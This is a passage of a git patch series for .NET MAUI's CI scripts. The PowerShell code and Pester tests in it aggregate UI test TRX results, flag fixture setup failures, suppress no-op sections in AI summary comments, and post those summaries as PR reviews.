-2006,19 +1562,6 @@ if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFi $uitestOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests" $uitestContentFile = Join-Path $uitestOutputDir "content.md" - # Preserve any STEP 3 results table that was appended earlier so - # the post-comment phase keeps the actual run output (categories + - # execution table) instead of just the refreshed category list. - $preservedExecution = "" - if (Test-Path $uitestContentFile) { - $existing = Get-Content $uitestContentFile -Raw - $marker = '### 🧪 UI Test Execution Results' - $idx = $existing.IndexOf($marker) - if ($idx -ge 0) { - $preservedExecution = $existing.Substring($idx) - } - } - if ($refreshedCategories -eq 'NONE') { "No UI test categories needed for this PR (no UI-relevant changes)." | Set-Content $uitestContentFile -Encoding UTF8 } elseif ([string]::IsNullOrWhiteSpace($refreshedCategories)) { @@ -2026,10 +1569,6 @@ if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFi } else { "**Detected UI test categories:** ``$refreshedCategories``" | Set-Content $uitestContentFile -Encoding UTF8 } - - if (-not [string]::IsNullOrWhiteSpace($preservedExecution)) { - Add-Content $uitestContentFile "`n$preservedExecution" -Encoding UTF8 - } } } catch { Write-Host " ⚠️ AI-tier category refresh failed (non-fatal, keeping Step 2 result): $_" -ForegroundColor Yellow @@ -2100,14 +1639,14 @@ if (-not $DryRun) { } # ═════════════════════════════════════════════════════════════════════════════ -# STEP 7: Post AI Summary Comment (direct script invocation) +# STEP 6: Post AI Summary Comment (direct script invocation) # When DEFER_COMMENT_TO_STAGE3=true, skip posting here — Stage 3 # (UpdateAISummaryComment) will post the full comment after deep tests. # ═════════════════════════════════════════════════════════════════════════════ Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Magenta -Write-Host "║ STEP 7: POST AI SUMMARY ║" -ForegroundColor Magenta +Write-Host "║ STEP 6: POST AI SUMMARY ║" -ForegroundColor Magenta Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Magenta $summaryScriptsDir = $ScriptsDir @@ -2138,7 +1677,7 @@ if (Test-Path $reviewScript) { # Persist comment ID + PR number to a known location and emit # as an output variable so the downstream UpdateAISummaryComment - # stage in ci-copilot.yml can rewrite the STEP 3 section once + # stage in ci-copilot.yml can rewrite the UI tests section once # the deep UI tests finish on the platform-pool agents. $commentIdFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/ai-summary-comment-id.txt" New-Item -ItemType Directory -Force -Path (Split-Path -Parent $commentIdFile) | Out-Null @@ -2303,12 +1842,12 @@ $( if ($truncated) { "`n_The diff was truncated to fit GitHub's review body limi } # ═════════════════════════════════════════════════════════════════════════════ -# STEP 8: Apply Labels +# STEP 7: Apply Labels # ═════════════════════════════════════════════════════════════════════════════ Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Blue -Write-Host "║ STEP 8: APPLY LABELS ║" -ForegroundColor Blue +Write-Host "║ STEP 7: APPLY LABELS ║" -ForegroundColor Blue Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Blue $labelHelperPath = Join-Path $ScriptsDir "shared/Update-AgentLabels.ps1" From d4deda6983c9b8523a08f4fc25abfc182abfa6c5 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Thu, 28 May 2026 16:10:35 +0200 Subject: [PATCH 16/34] Fix deep UI setup failure reporting Detect category-wide fixture setup failures in deep UI TRX aggregation and render them as setup failures instead of duplicated failed tests. Keep the deep UI task successful so the summary comment stage can publish the artifact-backed result. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../Aggregate-UITestArtifacts.Tests.ps1 | 31 +++++++- .../shared/Aggregate-UITestArtifacts.ps1 | 54 +++++++++++-- .../shared/Get-AggregatedTrxFromDirectory.ps1 | 54 +++++++++++-- eng/pipelines/ci-copilot.yml | 76 ++++++++++++++++++- 4 files changed, 197 insertions(+), 18 deletions(-) diff --git a/.github/scripts/shared/Aggregate-UITestArtifacts.Tests.ps1 b/.github/scripts/shared/Aggregate-UITestArtifacts.Tests.ps1 index 077556a88a95..0b131f65ba2c 100644 --- a/.github/scripts/shared/Aggregate-UITestArtifacts.Tests.ps1 +++ b/.github/scripts/shared/Aggregate-UITestArtifacts.Tests.ps1 @@ -27,14 +27,19 @@ BeforeAll { [int]$Failed, [int]$Skipped = 0, [string[]]$PassedTests = @(), - [string[]]$FailedTests = @() + [string[]]$FailedTests = @(), + [string]$FailedMessage = 'boom', + [string]$FailedStack = '' ) $executed = $Total - $Skipped + $failedMessageXml = [System.Security.SecurityElement]::Escape($FailedMessage) + $failedStackXml = [System.Security.SecurityElement]::Escape($FailedStack) + $stackXml = if ([string]::IsNullOrEmpty($FailedStack)) { '' } else { "$failedStackXml" } $passedXml = ($PassedTests | ForEach-Object { " " }) -join "`n" $failedXml = ($FailedTests | ForEach-Object { - " boom" + " $failedMessageXml$stackXml" }) -join "`n" @" @@ -128,6 +133,7 @@ Describe 'Get-AggregatedTrxFromDirectory (TRX walk + merge)' { $r[$cvKey].Total | Should -Be 619 $r[$cvKey].Passed | Should -Be 75 $r[$cvKey].Failed | Should -Be 544 + $r[$cvKey].SetupFailure | Should -Be $false $edKey = $r.Keys | Where-Object { $_ -match 'Editor' } | Select-Object -First 1 $edKey | Should -Not -BeNullOrEmpty @@ -136,6 +142,27 @@ Describe 'Get-AggregatedTrxFromDirectory (TRX walk + merge)' { $r[$edKey].Failed | Should -Be 68 } + It 'marks category-wide fixture setup failures without changing TRX counters' { + $setupRoot = Join-Path $script:fixtureRoot 'setup-failure-test' + New-Item -ItemType Directory -Path $setupRoot -Force | Out-Null + $catDir = Join-Path $setupRoot 'drop-android_ui_tests-controls-WebView' + New-Item -ItemType Directory -Path $catDir -Force | Out-Null + New-TrxFixture -Path (Join-Path $catDir 'webview.trx') ` + -Total 2 -Passed 0 -Failed 2 ` + -FailedTests @('WebViewTest1','WebViewTest2') ` + -FailedMessage 'OneTimeSetUp: System.TimeoutException : Timed out waiting for Go To Test button to appear' ` + -FailedStack 'at Microsoft.Maui.TestUtils.DeviceTests.Runners.UITestBase.OneTimeSetup()' + + $r = Get-AggregatedTrxFromDirectory -RootDir $setupRoot + $key = @($r.Keys)[0] + + $r[$key].Total | Should -Be 2 + $r[$key].Failed | Should -Be 2 + $r[$key].SetupFailure | Should -Be $true + $r[$key].SetupFailureCount | Should -Be 2 + $r[$key].SetupFailureMessage | Should -Match 'Go To Test button' + } + It 'sums multiple TRX files for the same category' { $double = Join-Path $script:fixtureRoot 'double-test' New-Item -ItemType Directory -Path $double -Force | Out-Null diff --git a/.github/scripts/shared/Aggregate-UITestArtifacts.ps1 b/.github/scripts/shared/Aggregate-UITestArtifacts.ps1 index 306a5ff548bb..25e188e927a3 100644 --- a/.github/scripts/shared/Aggregate-UITestArtifacts.ps1 +++ b/.github/scripts/shared/Aggregate-UITestArtifacts.ps1 @@ -120,13 +120,18 @@ function Get-AggregatedTrxFromDirectory { if (-not $byCategory.ContainsKey($category)) { $byCategory[$category] = @{ - Total = 0 - Passed = 0 - Failed = 0 - Skipped = 0 - Results = @() - TrxPaths = @() - ArtifactName = $artName + Total = 0 + Passed = 0 + Failed = 0 + Skipped = 0 + Results = @() + TrxPaths = @() + ArtifactName = $artName + SetupFailure = $false + SetupFailureCount = 0 + SetupFailureMessage = '' + SetupFailureStack = '' + SetupFailureSignatureCount = 0 } } $cur = $byCategory[$category] @@ -139,6 +144,41 @@ function Get-AggregatedTrxFromDirectory { $byCategory[$category] = $cur } + foreach ($category in @($byCategory.Keys)) { + $cur = $byCategory[$category] + $failedResults = @($cur.Results | Where-Object { $_.status -eq 'Failed' }) + if ($failedResults.Count -eq 0) { + continue + } + + $setupFailures = @($failedResults | Where-Object { + $errorText = [string]($_.error) + $stackText = [string]($_.stack) + $errorText -match '^\s*OneTimeSetUp:' -or + $errorText -match 'Timed out waiting for Go To Test button to appear' -or + $stackText -match '(_GalleryUITest\.FixtureSetup|\bFixtureSetup\b|UITestBase\.(OneTimeSetup|TestSetup))' + }) + + if ($setupFailures.Count -ne $failedResults.Count) { + continue + } + + $signatures = @{} + foreach ($failure in $setupFailures) { + $errorText = ([string]($failure.error) -replace '\s+', ' ').Trim() + $stackText = ([string]($failure.stack) -replace '\s+', ' ').Trim() + $signatures["$errorText|$stackText"] = $true + } + + $sample = $setupFailures | Select-Object -First 1 + $cur.SetupFailure = $true + $cur.SetupFailureCount = $setupFailures.Count + $cur.SetupFailureMessage = ([string]($sample.error)).Trim() + $cur.SetupFailureStack = ([string]($sample.stack)).Trim() + $cur.SetupFailureSignatureCount = $signatures.Count + $byCategory[$category] = $cur + } + return $byCategory } diff --git a/.github/scripts/shared/Get-AggregatedTrxFromDirectory.ps1 b/.github/scripts/shared/Get-AggregatedTrxFromDirectory.ps1 index bba2c0e8dd02..4652213ad1f5 100644 --- a/.github/scripts/shared/Get-AggregatedTrxFromDirectory.ps1 +++ b/.github/scripts/shared/Get-AggregatedTrxFromDirectory.ps1 @@ -18,13 +18,18 @@ function Get-AggregatedTrxFromDirectory { if (-not $byCategory.ContainsKey($category)) { $byCategory[$category] = @{ - Total = 0 - Passed = 0 - Failed = 0 - Skipped = 0 - Results = @() - TrxPaths = @() - ArtifactName = $artName + Total = 0 + Passed = 0 + Failed = 0 + Skipped = 0 + Results = @() + TrxPaths = @() + ArtifactName = $artName + SetupFailure = $false + SetupFailureCount = 0 + SetupFailureMessage = '' + SetupFailureStack = '' + SetupFailureSignatureCount = 0 } } $cur = $byCategory[$category] @@ -37,5 +42,40 @@ function Get-AggregatedTrxFromDirectory { $byCategory[$category] = $cur } + foreach ($category in @($byCategory.Keys)) { + $cur = $byCategory[$category] + $failedResults = @($cur.Results | Where-Object { $_.status -eq 'Failed' }) + if ($failedResults.Count -eq 0) { + continue + } + + $setupFailures = @($failedResults | Where-Object { + $errorText = [string]($_.error) + $stackText = [string]($_.stack) + $errorText -match '^\s*OneTimeSetUp:' -or + $errorText -match 'Timed out waiting for Go To Test button to appear' -or + $stackText -match '(_GalleryUITest\.FixtureSetup|\bFixtureSetup\b|UITestBase\.(OneTimeSetup|TestSetup))' + }) + + if ($setupFailures.Count -ne $failedResults.Count) { + continue + } + + $signatures = @{} + foreach ($failure in $setupFailures) { + $errorText = ([string]($failure.error) -replace '\s+', ' ').Trim() + $stackText = ([string]($failure.stack) -replace '\s+', ' ').Trim() + $signatures["$errorText|$stackText"] = $true + } + + $sample = $setupFailures | Select-Object -First 1 + $cur.SetupFailure = $true + $cur.SetupFailureCount = $setupFailures.Count + $cur.SetupFailureMessage = ([string]($sample.error)).Trim() + $cur.SetupFailureStack = ([string]($sample.stack)).Trim() + $cur.SetupFailureSignatureCount = $signatures.Count + $byCategory[$category] = $cur + } + return $byCategory } diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 8a571ef15eb2..ebce013b91ea 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -1278,6 +1278,7 @@ stages: # from running. Write-Host "##vso[task.logissue type=warning]One or more deep UI test categories failed (see TRX in drop-deep-uitests artifact)" } + exit 0 displayName: 'Run deep UI tests (per-category loop)' timeoutInMinutes: 220 @@ -1412,6 +1413,7 @@ stages: # Render the new STEP 3 section. $totalPassed = 0; $totalFailed = 0 + $setupFailureCategories = 0; $setupImpactedTests = 0; $emptyCategories = 0 $sb = [System.Text.StringBuilder]::new() [void]$sb.AppendLine() [void]$sb.AppendLine("### 🧪 UI Test Execution Results (deep, platform pool)") @@ -1419,6 +1421,7 @@ stages: [void]$sb.AppendLine("| Category | Tests | Snapshot diffs |") [void]$sb.AppendLine("|---|---|---|") $perCategoryFailures = [ordered]@{} + $perCategorySetupFailures = [ordered]@{} foreach ($k in ($byCat.Keys | Sort-Object)) { $b = $byCat[$k] $totalPassed += [int]$b.Passed @@ -1426,7 +1429,16 @@ stages: $tCount = [int]$b.Total $tPass = [int]$b.Passed $tFail = [int]$b.Failed - $col = if ($tCount -eq 0) { '—' } + $isSetupFailure = ($b.ContainsKey('SetupFailure') -and [bool]$b.SetupFailure) + if ($isSetupFailure) { + $setupFailureCategories++ + $setupImpactedTests += [int]$b.SetupFailureCount + } + if ($tCount -eq 0) { + $emptyCategories++ + } + $col = if ($tCount -eq 0) { '0 tests' } + elseif ($isSetupFailure) { "$tPass/$tCount (setup failed; $tFail marked failed)" } elseif ($tFail -gt 0) { "$tPass/$tCount ($tFail ❌)" } else { "$tPass/$tCount ✓" } # Count snapshot-diff PNGs we shipped in this artifact subdir @@ -1441,6 +1453,15 @@ stages: # Capture failed test entries from the parsed TRX so we can # render a per-category disclosure section listing the actual # failing test names + the first line of their error message. + if ($isSetupFailure) { + $perCategorySetupFailures[$k] = [pscustomobject]@{ + Count = [int]$b.SetupFailureCount + Message = $b.SetupFailureMessage -as [string] + Stack = $b.SetupFailureStack -as [string] + SignatureCount = [int]$b.SetupFailureSignatureCount + } + continue + } $catFailed = @() foreach ($r in @($b.Results)) { if ($r.status -eq 'Failed') { @@ -1456,6 +1477,41 @@ stages: } } + # Fixture setup failures usually mark every test in the fixture as + # failed even though no individual test body ran. Render one + # representative setup error instead of dozens of duplicate tests. + if ($perCategorySetupFailures.Count -gt 0) { + [void]$sb.AppendLine() + foreach ($cat in $perCategorySetupFailures.Keys) { + $info = $perCategorySetupFailures[$cat] + $setupCount = [int]$info.Count + $setupTestText = if ($setupCount -eq 1) { '1 test' } else { "$setupCount tests" } + [void]$sb.AppendLine("
⚠️ $cat — fixture setup failed for $setupTestText") + [void]$sb.AppendLine("
") + [void]$sb.AppendLine() + [void]$sb.AppendLine("NUnit reported a `OneTimeSetUp`/fixture setup failure before test bodies ran; the TRX marked each affected test failed.") + if ([int]$info.SignatureCount -gt 1) { + [void]$sb.AppendLine() + [void]$sb.AppendLine("_Multiple setup failure signatures were present; showing the first one. See the TRX artifact for all details._") + } + $errText = if (-not [string]::IsNullOrWhiteSpace($info.Message)) { $info.Message.Trim() } else { '' } + $stackText = if (-not [string]::IsNullOrWhiteSpace($info.Stack)) { $info.Stack.Trim() } else { '' } + $combined = $errText + if ($stackText) { $combined = $combined + [Environment]::NewLine + $stackText } + if ($combined.Length -gt 1500) { $combined = $combined.Substring(0, 1500) + [Environment]::NewLine + '...' } + if ($combined) { + [void]$sb.AppendLine() + $fence = [string]::new([char]96, 3) + [void]$sb.AppendLine($fence) + [void]$sb.AppendLine($combined) + [void]$sb.AppendLine($fence) + } + [void]$sb.AppendLine() + [void]$sb.AppendLine("
") + [void]$sb.AppendLine() + } + } + # Per-category failed-test disclosure sections (collapsed by # default to keep the comment compact). if ($perCategoryFailures.Count -gt 0) { @@ -1503,7 +1559,23 @@ stages: [void]$sb.AppendLine() $resultIcon = if ($totalFailed -gt 0) { '❌' } elseif ($totalPassed -gt 0) { '✅' } else { '⏭️' } - $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed, $totalFailed failed across $($byCat.Count) categor$(if ($byCat.Count -eq 1) {'y'} else {'ies'}) on platform-pool agent (replaces in-process counts above)." + $categoryText = if ($byCat.Count -eq 1) { '1 category' } else { "$($byCat.Count) categories" } + $regularFailed = [Math]::Max(0, $totalFailed - $setupImpactedTests) + if ($setupFailureCategories -gt 0) { + $setupCategoryText = if ($setupFailureCategories -eq 1) { '1 category setup failure' } else { "$setupFailureCategories category setup failures" } + $setupImpactedText = if ($setupImpactedTests -eq 1) { '1 impacted test' } else { "$setupImpactedTests impacted tests" } + if ($regularFailed -eq 0) { + $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed; $setupCategoryText ($setupImpactedText marked failed by TRX) across $categoryText on platform-pool agent (replaces in-process counts above)." + } else { + $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed, $regularFailed failed, plus $setupCategoryText ($setupImpactedText marked failed by TRX) across $categoryText on platform-pool agent (replaces in-process counts above)." + } + } else { + $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed, $totalFailed failed across $categoryText on platform-pool agent (replaces in-process counts above)." + } + if ($emptyCategories -gt 0) { + $emptyText = if ($emptyCategories -eq 1) { '1 category reported 0 tests.' } else { "$emptyCategories categories reported 0 tests." } + $headerLine = "$headerLine $emptyText" + } $beginMarker = '' $endMarker = '' From bbd60558bfd150d638276631f93b3546ab2f7387 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Thu, 28 May 2026 17:36:24 +0200 Subject: [PATCH 17/34] Hide no-op AI summary sections Skip rendering UI test and regression cross-reference sections when their content only reports no actionable work. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../scripts/Post-AISummaryComment.Tests.ps1 | 75 +++++++++++++++++++ .github/scripts/post-ai-summary-comment.ps1 | 33 ++++++++ 2 files changed, 108 insertions(+) create mode 100644 .github/scripts/Post-AISummaryComment.Tests.ps1 diff --git a/.github/scripts/Post-AISummaryComment.Tests.ps1 b/.github/scripts/Post-AISummaryComment.Tests.ps1 new file mode 100644 index 000000000000..81ebc4331f54 --- /dev/null +++ b/.github/scripts/Post-AISummaryComment.Tests.ps1 @@ -0,0 +1,75 @@ +#!/usr/bin/env pwsh +#Requires -Modules Pester +<# +.SYNOPSIS + Pester tests for pure-function helpers in post-ai-summary-comment.ps1. + +.EXAMPLE + Invoke-Pester ./Post-AISummaryComment.Tests.ps1 +#> + +BeforeAll { + $scriptPath = Join-Path $PSScriptRoot 'post-ai-summary-comment.ps1' + $tokens = $null + $parseErrors = $null + $ast = [System.Management.Automation.Language.Parser]::ParseFile($scriptPath, [ref]$tokens, [ref]$parseErrors) + if ($parseErrors -and $parseErrors.Count -gt 0) { + throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine + } + + $function = $ast.Find({ + $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and + $args[0].Name -eq 'Test-PhaseContentIsNoOp' + }, $true) + + if (-not $function) { + throw "Function 'Test-PhaseContentIsNoOp' not found" + } + + Invoke-Expression $function.Extent.Text +} + +Describe 'Test-PhaseContentIsNoOp' { + It 'suppresses the no-UI-tests placeholder' { + Test-PhaseContentIsNoOp ` + -PhaseKey 'uitests' ` + -Content 'No UI test categories needed for this PR (no UI-relevant changes).' | + Should -BeTrue + } + + It 'keeps UI test content when categories or full matrix are present' { + Test-PhaseContentIsNoOp ` + -PhaseKey 'uitests' ` + -Content '**Detected UI test categories:** `Button,Entry`' | + Should -BeFalse + + Test-PhaseContentIsNoOp ` + -PhaseKey 'uitests' ` + -Content 'Full UI test matrix will run (no specific categories detected from PR changes).' | + Should -BeFalse + } + + It 'suppresses regression placeholders when there are no implementation files or risks' { + Test-PhaseContentIsNoOp ` + -PhaseKey 'regression-check' ` + -Content '🟢 No implementation files modified — skipping regression cross-reference.' | + Should -BeTrue + + Test-PhaseContentIsNoOp ` + -PhaseKey 'regression-check' ` + -Content "## 🔍 Regression Cross-Reference`n`n🟢 No regression risks detected. No labeled bug-fix PRs in the last 6 months touched the modified files." | + Should -BeTrue + } + + It 'keeps actionable regression content' { + Test-PhaseContentIsNoOp ` + -PhaseKey 'regression-check' ` + -Content "## 🔍 Regression Cross-Reference`n`n🟡 **Overlaps with prior bug-fix PRs** — same files modified, but no exact line revert detected." | + Should -BeFalse + + Test-PhaseContentIsNoOp ` + -PhaseKey 'regression-check' ` + -Content '⚠️ Regression cross-reference failed: gh api failed' | + Should -BeFalse + } +} diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 5648709851a6..9f9f691de062 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -79,6 +79,34 @@ $phases = [ordered]@{ "report" = @{ File = "report/content.md"; Icon = "📋"; Title = "Report — Final Recommendation" } } +function Test-PhaseContentIsNoOp { + param( + [Parameter(Mandatory = $true)] + [string]$PhaseKey, + + [Parameter(Mandatory = $true)] + [string]$Content + ) + + $normalized = ($Content -replace "`r`n", "`n").Trim() + + switch ($PhaseKey) { + "uitests" { + return $normalized -match '^No UI test categories needed for this PR \(no UI-relevant changes\)\.?$' + } + "regression-check" { + $withoutHeading = ($normalized -replace '(?m)^##\s+.*Regression Cross-Reference\s*\n+', '').Trim() + return ( + $withoutHeading -match '^🟢\s+No implementation files modified\s+[—-]\s+skipping regression cross-reference\.\s*$' -or + $withoutHeading -match '^🟢\s+No regression risks detected\.\s+No labeled bug-fix PRs in the last \d+ months touched the modified files\.\s*$' + ) + } + default { + return $false + } + } +} + # ─── Gate content (rendered first, always open) ─── $gateSection = $null $gateFilePath = Join-Path $PRAgentDir "gate/content.md" @@ -111,6 +139,11 @@ foreach ($key in $phases.Keys) { if (Test-Path $filePath) { $content = Get-Content $filePath -Raw -Encoding UTF8 if (-not [string]::IsNullOrWhiteSpace($content)) { + if (Test-PhaseContentIsNoOp -PhaseKey $key -Content $content) { + Write-Host " ⏭️ $key (no actionable content)" -ForegroundColor Gray + continue + } + Write-Host " ✅ $key ($((Get-Item $filePath).Length) bytes)" -ForegroundColor Green # For uitests, make title dynamic: "UI Tests — Cat1, Cat2" $phaseTitle = "$($phase.Icon) $($phase.Title)" From d3069ceb8e072338e22d446f29f5e1821940f83d Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 13:46:06 +0200 Subject: [PATCH 18/34] Enhance MauiBot review posting Post AI summaries as PR reviews with parsed verdicts, hide stale MauiBot artifacts instead of deleting them, and preserve same-run try-fix reviews. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Find-RegressionRisks.ps1 | 4 +- .../scripts/Post-AISummaryComment.Tests.ps1 | 35 ++- .../Remove-StaleMauiBotComments.Tests.ps1 | 58 ++++ .github/scripts/Review-PR.Tests.ps1 | 2 +- .github/scripts/Review-PR.ps1 | 58 ++-- .github/scripts/post-ai-summary-comment.ps1 | 188 +++++++++--- .../shared/Remove-StaleMauiBotComments.ps1 | 281 +++++++++++++++--- .github/skills/code-review/SKILL.md | 4 +- .github/skills/find-regression-risk/SKILL.md | 2 +- eng/pipelines/ci-copilot.yml | 68 ++--- 10 files changed, 554 insertions(+), 146 deletions(-) create mode 100644 .github/scripts/Remove-StaleMauiBotComments.Tests.ps1 diff --git a/.github/scripts/Find-RegressionRisks.ps1 b/.github/scripts/Find-RegressionRisks.ps1 index eae088686e68..efa5da467bac 100644 --- a/.github/scripts/Find-RegressionRisks.ps1 +++ b/.github/scripts/Find-RegressionRisks.ps1 @@ -14,7 +14,7 @@ added → 🔴 REVERT. Same file but no line match → 🟡 OVERLAP. Otherwise → 🟢 CLEAN. Outputs (when -OutputDir is provided): - - content.md Markdown summary suitable for the wall-of-text PR comment. + - content.md Markdown summary suitable for the wall-of-text PR review. - risks.json Structured findings for downstream agents. - result.txt One token: CLEAN | OVERLAP | REVERT (used by Review-PR.ps1 for branching). @@ -726,7 +726,7 @@ if ($OutputDir) { } | ConvertTo-Json -Depth 6 $payload | Set-Content (Join-Path $OutputDir 'risks.json') -Encoding UTF8 - # content.md — markdown summary for the wall-of-text PR comment + # content.md — markdown summary for the wall-of-text PR review $md = New-Object System.Text.StringBuilder [void]$md.AppendLine("## 🔍 Regression Cross-Reference") [void]$md.AppendLine() diff --git a/.github/scripts/Post-AISummaryComment.Tests.ps1 b/.github/scripts/Post-AISummaryComment.Tests.ps1 index 81ebc4331f54..b02a84fda302 100644 --- a/.github/scripts/Post-AISummaryComment.Tests.ps1 +++ b/.github/scripts/Post-AISummaryComment.Tests.ps1 @@ -17,16 +17,18 @@ BeforeAll { throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine } - $function = $ast.Find({ - $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and - $args[0].Name -eq 'Test-PhaseContentIsNoOp' - }, $true) + foreach ($functionName in @('Test-PhaseContentIsNoOp', 'Get-AIReviewEvent')) { + $function = $ast.Find({ + $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and + $args[0].Name -eq $functionName + }, $true) - if (-not $function) { - throw "Function 'Test-PhaseContentIsNoOp' not found" - } + if (-not $function) { + throw "Function '$functionName' not found" + } - Invoke-Expression $function.Extent.Text + Invoke-Expression $function.Extent.Text + } } Describe 'Test-PhaseContentIsNoOp' { @@ -73,3 +75,20 @@ Describe 'Test-PhaseContentIsNoOp' { Should -BeFalse } } + +Describe 'Get-AIReviewEvent' { + It 'maps an exact approve recommendation to APPROVE' { + Get-AIReviewEvent -ReportContent "## ✅ Final Recommendation: APPROVE`n`nLooks good." | + Should -Be 'APPROVE' + } + + It 'maps an exact request-changes recommendation to REQUEST_CHANGES' { + Get-AIReviewEvent -ReportContent "## ⚠️ Final Recommendation: REQUEST CHANGES`n`nNeeds the try-fix candidate." | + Should -Be 'REQUEST_CHANGES' + } + + It 'falls back to COMMENT when the recommendation is missing or ambiguous' { + Get-AIReviewEvent -ReportContent '' | Should -Be 'COMMENT' + Get-AIReviewEvent -ReportContent 'Recommendation: APPROVE after manual review' | Should -Be 'COMMENT' + } +} diff --git a/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 b/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 new file mode 100644 index 000000000000..21c43a0813ed --- /dev/null +++ b/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 @@ -0,0 +1,58 @@ +#!/usr/bin/env pwsh +#Requires -Modules Pester +<# +.SYNOPSIS + Pester tests for stale MauiBot artifact helper pure functions. +#> + +BeforeAll { + $scriptPath = Join-Path $PSScriptRoot 'shared/Remove-StaleMauiBotComments.ps1' + $tokens = $null + $parseErrors = $null + $ast = [System.Management.Automation.Language.Parser]::ParseFile($scriptPath, [ref]$tokens, [ref]$parseErrors) + if ($parseErrors -and $parseErrors.Count -gt 0) { + throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine + } + + . $scriptPath +} + +Describe 'MauiBot artifact marker detection' { + It 'detects AI Summary artifacts by marker' { + Test-IsAISummaryCommentBody -Body "`n## AI Summary" | + Should -BeTrue + } + + It 'detects try-fix artifacts by current and legacy text markers' { + Test-IsTryFixCommentBody -Body "`nBody" | + Should -BeTrue + + Test-IsTryFixCommentBody -Body 'Automated review — alternative fix proposed' | + Should -BeTrue + } +} + +Describe 'Test-ShouldPreserveMauiBotArtifact' { + It 'preserves artifacts by node id or REST id' { + $artifact = [pscustomobject]@{ + id = 123 + node_id = 'PRR_test' + } + + Test-ShouldPreserveMauiBotArtifact -Artifact $artifact -PreserveNodeIds @('PRR_test') | + Should -BeTrue + + Test-ShouldPreserveMauiBotArtifact -Artifact $artifact -PreserveIds @('123') | + Should -BeTrue + } + + It 'does not preserve unmatched artifacts' { + $artifact = [pscustomobject]@{ + id = 123 + node_id = 'PRR_test' + } + + Test-ShouldPreserveMauiBotArtifact -Artifact $artifact -PreserveNodeIds @('other') -PreserveIds @('456') | + Should -BeFalse + } +} diff --git a/.github/scripts/Review-PR.Tests.ps1 b/.github/scripts/Review-PR.Tests.ps1 index f3674a0af24a..3d94ccc038ca 100644 --- a/.github/scripts/Review-PR.Tests.ps1 +++ b/.github/scripts/Review-PR.Tests.ps1 @@ -9,7 +9,7 @@ when TRX is missing) These functions sit on the critical path of STEP 3 (UI Test Execution - Results in the AI summary comment). A regression here can silently + Results in the AI summary review). A regression here can silently misrender per-test counts (e.g. "1/1 (1 ❌)" instead of "75/619 (544 ❌)") so they're worth pinning with focused tests. diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index c966ce7d9218..f1da6706ae02 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -398,7 +398,7 @@ if ($Phase -and $Phase -ne 'Setup') { # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ────── # Extracts per-test results (Passed/Failed/Skipped) plus failure messages and # stack traces from raw stdout. Used by the RunDeepUITests stage and Gate so the -# AI summary comment shows WHICH tests failed and WHY, not just an aggregate exit code. +# AI summary review shows WHICH tests failed and WHY, not just an aggregate exit code. function Get-DotNetTestResults { param([string[]]$Lines) @@ -1010,7 +1010,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O # inline-stages architecture. Both phases are expensive (build the whole # repo, run agents on multiple candidates) and we just need STEPs 1-3 + # STEP 6 (post comment) to validate that detectedCategories / -# aiSummaryCommentId output variables flow through to the new +# aiSummaryReviewId output variables flow through to the new # RunDeepUITests + UpdateAISummaryComment stages. Flip $skipGateAndTryFix # back to $false (or delete the wrapper) once the new pipeline stages # are validated end-to-end. @@ -1639,9 +1639,9 @@ if (-not $DryRun) { } # ═════════════════════════════════════════════════════════════════════════════ -# STEP 6: Post AI Summary Comment (direct script invocation) +# STEP 6: Post AI Summary Review (direct script invocation) # When DEFER_COMMENT_TO_STAGE3=true, skip posting here — Stage 3 -# (UpdateAISummaryComment) will post the full comment after deep tests. +# (UpdateAISummaryComment) will post the full review after deep tests. # ═════════════════════════════════════════════════════════════════════════════ Write-Host "" @@ -1655,11 +1655,12 @@ if ($env:DEFER_COMMENT_TO_STAGE3 -eq 'true') { Write-Host " ⏭️ Deferred to Stage 3 (DEFER_COMMENT_TO_STAGE3=true)" -ForegroundColor Gray Write-Host " ℹ️ Content files saved in CopilotLogs artifact" -ForegroundColor Gray # Still emit a dummy output var so Stage 3 condition works - Write-Host "##vso[task.setvariable variable=aiSummaryCommentId;isOutput=true]DEFERRED" + Write-Host "##vso[task.setvariable 